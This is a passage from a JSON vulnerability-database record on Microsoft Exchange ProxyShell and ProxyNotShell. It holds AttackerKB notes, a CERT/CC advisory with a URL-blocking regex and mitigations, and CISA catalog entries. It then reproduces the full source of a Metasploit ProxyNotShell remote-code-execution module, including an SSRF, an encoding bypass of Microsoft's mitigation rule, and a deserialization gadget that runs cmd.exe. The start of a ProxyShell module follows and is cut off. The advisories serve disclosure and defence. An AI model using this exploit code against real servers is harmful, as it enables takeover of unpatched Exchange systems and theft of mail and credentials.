"CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-20T00:00:00", "id": "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "href": "https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:04:03", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-08-11T23:30:10", "description": "### Overview\n\nMicrosoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. \n\n### Description\n\nMicrosoft Exchange Server's [ Autodiscover service](<https://learn.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) is a web service widely available to any Microsoft Exchange Web Services (EWS) client. Since Microsoft Exchange version 2016, the Autodiscover service has become an integral part of the Microsoft Exchange system, and it is no longer independently provided by a Client Access server. The Autodiscover service and a number of other privileged mailbox services are hosted on the default Internet Information Services server running on the Mailbox server. \n\nCybersecurity company GTSC [observed an abuse of the Autodiscover service in August of 2022](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) using a crafted URL SSRF attack, similar to the earlier [ProxyShell](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) vulnerability reported in August 2021. The observed attack appears to have implemented [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) to gain privileged access and [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) to perform remote code execution via PowerShell. Microsoft Security Research Center has [acknowledged the vulnerability and provided guidance for mitigation](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The guidance highlights that Microsoft Exchange Online customers will be provided with detection and mitigation defenses automatically from Microsoft's managed Infrastructure, informing them of any attempts to exploit these vulnerabilities. \n\n### Impact\n\nAn authenticated remote attacker can perform SSRF attacks to escalate privileges and execute arbtirary PowerShell code on vulnerable Microsoft Exchange servers. As the attack is targeted against Microsoft Exchange Mailbox server, the attacker can potentially gain access to other resources via lateral movement into Exchange and Active Directory environments.\n\n### Solution\n\n#### Workaround guidance\n\nMicrosoft has provided guidance in their [recent blog post](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) to address the issue. Note that Microsoft has updated their guidance for the Option 3 Step 6 with the URL filter to be _.*autodiscover\\\\.json.*Powershell.*_ (excluding the _@_ symbol) instead of the earlier _.*autodiscover\\\\.json.*\\@.*Powershell.*_. The recommended block pattern is a regular expression suggested by [Jang](<https://twitter.com/testanull>) to prevent known variants of the #ProxyNotShell attacks. Microsoft further updated their advisory on October 8th suggesting **Condition Input** should be changed from {URL} to {UrlDecode:{REQUEST_URI}} to ensure all encoded variations are evaluated before being blocked.\n\n#### Apply update when available\n\nAs of October 3, 2022, there is no patch available to mitigate this issue. It is recommended that Microsoft Exchange administrators stay on alert for any advisory or patch released by Microsoft. Note the latest security updates from Microsoft on [October 11th](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>) **do not** address the vulnerabilities highlighted here. Even with the workaround in place, many on-premise Microsoft Exchange instances remain at risk until Microsoft provides a patch and the patch has been applied.\n\nOn November 8th 2022, Microsoft has provided fixes as part of their Patch Tuesday rollout, see updated Microsoft's guidance at [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) and [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>). \n\n#### Third-party web application protection\n\nExchange Administrators who use third-party Web Application Firewall (WAF) products can implement the recommended URL filters and blocks as part of their WAF policy.\n\n#### Other mitigations\n\nExchange Administrators can limit the outgoing connection from the Exchange Mailbox server using specific allowed list on an outgoing proxy to limit suspicious web requests.\n\nThis document was written by Vijay Sarvepalli.\n\n### Vendor Information\n\n915563\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-03 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Microsoft Vulnerability Research Unknown\n\nNotified: 2022-10-03 Updated: 2022-10-04 **CVE-2022-41040**| Unknown \n---|--- \n**CVE-2022-41082**| Unknown \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### References\n\n * <https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>\n * <https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>\n * <https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>\n * <https://rw.md/2022/11/09/ProxyNotRelay.html>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-41040 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41040>) [CVE-2022-41082 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-41082>) \n---|--- \n**API URL: ** | VINCE JSON | CSAF \n**Date Public:** | 2022-10-03 \n**Date First Published:** | 2022-10-03 \n**Date Last Updated: ** | 2022-11-10 01:59 UTC \n**Document Revision: ** | 9 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "cert", "title": "Microsoft Exchange vulnerable to server-side request forgery and remote code execution.", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-10T01:59:00", "id": "VU:915563", "href": "https://www.kb.cert.org/vuls/id/915563", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-08-11T21:25:24", "description": "Microsoft Exchange Server allows for server-side request forgery. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Server-Side Request Forgery Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41040", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T21:25:24", "description": "Microsoft Exchange Server contains an unspecified vulnerability which allows for authenticated remote code execution. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-41082", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-34473", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is chainable with CVE-2022-41082, which allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-01-10T00:00:00", "id": "CISA-KEV-CVE-2022-41080", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-11-30T21:04:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-30T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyNotShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-30T00:00:00", "id": "PACKETSTORM:170066", "href": "https://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Exchange \ninclude Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyNotShell RCE', \n'Description' => %q{ \nThis module chains two vulnerabilities on Microsoft Exchange Server \nthat, when combined, allow an authenticated attacker to interact with \nthe Exchange Powershell backend (CVE-2022-41040), where a \ndeserialization flaw can be leveraged to obtain code execution \n(CVE-2022-41082). This exploit only support Exchange Server 2019. \n \nThese vulnerabilities were patched in November 2022. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery of ProxyShell SSRF \n'Spencer McIntyre', # Metasploit module \n'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis \n'Piotr Bazyd\u0142o', # Vulnerability analysis \n'Rich Warren', # EEMS bypass via ProxyNotRelay \n'Soroush Dalili' # EEMS bypass \n], \n'References' => [ \n[ 'CVE', '2022-41040' ], # ssrf \n[ 'CVE', '2022-41082' ], # rce \n[ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], \n[ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], \n[ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], \n[ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] \n], \n'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyNotShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), \nOptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) \n]) \n \nregister_advanced_options([ \nOptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]]) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \n# actually run the powershell cmdlet and see if it works, this will fail if: \n# * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) \n# * the exchange emergency mitigation service M1 rule is in place \nreturn CheckCode::Safe unless execute_powershell('Get-Mailbox') \n \nCheckCode::Vulnerable \nrescue Msf::Exploit::Failed => e \nCheckCode::Safe(e.to_s) \nend \n \ndef ibm037(string) \nstring.encode('IBM037').force_encoding('ASCII-8BIT') \nend \n \ndef send_http(method, uri, opts = {}) \nopts[:authentication] = { \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'preferred_auth' => 'NTLM' \n} \n \nif uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' \nuri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}\" \nopts[:headers] = { \n'X-Up-Devcap-Post-Charset' => 'IBM037', \n# technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 \n'User-Agent' => \"UP #{datastore['UserAgent']}\" \n} \nelse \nuri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\" \nend \n \nsuper(method, uri, opts) \nend \n \ndef exploit \n# if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not \n# work on Exchange Server 2016 \nif datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) \nvprint_status(\"Detected Exchange version: #{version}\") \nif version < Rex::Version.new('15.2') \nfail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') \nend \nend \n \n@ssrf_email ||= Faker::Internet.email \n \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nwhen :windows_dropper \nexecute_cmdstager({ linemax: 7_500 }) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nxaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<ResourceDictionary \nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" \nxmlns:System=\"clr-namespace:System;assembly=mscorlib\" \nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\"> \n<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\"> \n<ObjectDataProvider.MethodParameters> \n<System:String>cmd.exe</System:String> \n<System:String>/c #{cmd.encode(xml: :text)}</System:String> \n</ObjectDataProvider.MethodParameters> \n</ObjectDataProvider> \n</ResourceDictionary> \nXAML \n \nidentity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<Obj N=\"V\" RefId=\"14\"> \n<TN RefId=\"1\"> \n<T>System.ServiceProcess.ServiceController</T> \n<T>System.Object</T> \n</TN> \n<ToString>Object</ToString> \n<Props> \n<S N=\"Name\">Type</S> \n<Obj N=\"TargetTypeForDeserialization\"> \n<TN RefId=\"1\"> \n<T>System.Exception</T> \n<T>System.Object</T> \n</TN> \n<MS> \n<BA N=\"SerializationData\"> \n#{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} \n</BA> \n</MS> \n</Obj> \n</Props> \n<S> \n<![CDATA[#{xaml}]]> \n</S> \n</Obj> \nIDENTITY \n \nexecute_powershell('Get-Mailbox', args: [ \n{ name: '-Identity', value: identity } \n]) \nend \nend \n \nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream \ninclude Msf::Util::DotNetDeserialization \n \ndef self.generate \nfrom_values([ \nTypes::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), \nTypes::RecordValues::SystemClassWithMembersAndTypes.from_member_values( \nclass_info: Types::General::ClassInfo.new( \nobj_id: 1, \nname: 'System.UnitySerializationHolder', \nmember_names: %w[Data UnityType AssemblyName] \n), \nmember_type_info: Types::General::MemberTypeInfo.new( \nbinary_type_enums: %i[String Primitive String], \nadditional_infos: [ 8 ] \n), \nmember_values: [ \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 2, \nstring: 'System.Windows.Markup.XamlReader' \n)), \n4, \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 3, \nstring: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' \n)) \n] \n), \nTypes::RecordValues::MessageEnd.new \n]) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170066/exchange_proxynotshell_rce.rb.txt"}, {"lastseen": "2021-08-20T15:47:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "PACKETSTORM:163895", "href": "https://packetstormsecurity.com/files/163895/Microsoft-Exchange-ProxyShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'winrm' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyShell RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker to bypass the authentication (CVE-2021-31207), impersonate an \narbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, \nExchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, \nExchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery \n'Jang (@testanull)', # Vulnerability analysis \n'PeterJson', # Vulnerability analysis \n'brandonshi123', # Vulnerability analysis \n'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template \n'Spencer McIntyre', # Metasploit module \n'wvu' # Testing \n], \n'References' => [ \n[ 'CVE', '2021-34473' ], \n[ 'CVE', '2021-34523' ], \n[ 'CVE', '2021-31207' ], \n[ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ], \n[ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ], \n[ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ] \n], \n'DisclosureDate' => '2021-04-06', # pwn2own 2021 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => 